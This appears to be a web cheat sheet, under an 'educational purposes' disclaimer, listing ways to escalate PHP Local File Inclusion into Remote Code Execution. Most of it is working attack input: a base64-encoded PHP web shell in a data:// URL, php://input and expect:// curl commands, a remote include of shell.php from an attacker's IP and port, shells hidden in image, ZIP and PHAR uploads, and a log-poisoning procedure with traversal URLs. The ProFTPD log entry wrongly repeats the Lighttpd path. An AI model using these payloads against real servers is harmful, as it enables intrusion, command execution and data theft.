Skip to content
Disclaimer: This material is provided solely for educational purposes. You are fully responsible for how you use the information.
We do not encourage any kind of illegal or harmful activity.

Introduction

Remote Code Execution (RCE) is a vulnerability that enables an attacker to execute arbitrary commands on a remote system. This exploit allows the attacker to manipulate or access data, disrupt system operations, or gain elevated privileges.

Remote Code Execution (RCE) Techniques

  1. Data Wrapper: Executes commands encoded directly in the URL.
    /index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==&cmd=id

  2. Input Wrapper: Runs commands from data sent in a web request.
    curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://[DOMAIN_NAME]/index.php?language=php://input&cmd=whoami"

  3. Expect Wrapper: Executes commands using the Expect PHP wrapper.
    curl -s "http://[DOMAIN_NAME]/index.php?language=expect://id"

  4. Remote PHP Shell: Uses a remote PHP script to execute commands.
    /index.php?language=http://[IP-ADDRESS]:[LISTENING-PORT]/shell.php&cmd=id

  5. Malicious Image Upload: Executes code hidden within an image file.
    /index.php?language=./profile_images/shell.gif&cmd=id

  6. Malicious ZIP Upload: Runs PHP code hidden inside a ZIP file.
    /index.php?language=zip://shell.zip#shell.php&cmd=id

  7. Malicious PHAR Upload: Executes code from a PHP archive disguised as an image file.
    /index.php?language=phar://./profile_images/shell.jpg/shell.txt&cmd=id

Target Logs for RCE Poisoning

Logs vulnerable to RCE poisoning often include user inputs or error information:

  1. Access Logs:
    /var/log/apache2/access.log, /var/log/httpd-access.log
  2. Error Logs:
    /var/log/apache2/error.log, /var/log/apache/error.log
  3. Logs to Tracks authentication attempts.
    /var/log/auth.log
  4. Logs security details, used in systems with SELinux.
    /var/log/secure
  5. Logs For web applications.
    /var/www/logs/access_log
  6. Logs for Webmin tool.
    /var/webmin/miniserv.log
  7. Logs from Lighttpd web server.
    /var/log/lighttpd/access.log
  8. Logs from ProFTPD server.
    /var/log/lighttpd/access.log -

Step-by-Step: RCE via Log Poisoning

  1. Inject the Payload: This involves modifying the User-Agent string, other header fields, or the content of a request that you know will be logged.
    <?php system($_GET['cmd']); ?>.

  2. Exploit LFI Vulnerability: Use an existing Local File Inclusion (LFI) vulnerability to include the poisoned log file in a web page's execution path.
    http://[DOMAIN_NAME]/index.php?file=../../../../var/log/apache2/access.log

  3. Execute the Payload: Add a command to the URL as a parameter if the payload is designed to be executed via a GET request.
    http://[RFI-URL]/vulnerable_page.php?file=../../../../var/log/apache2/access.log&cmd=whoami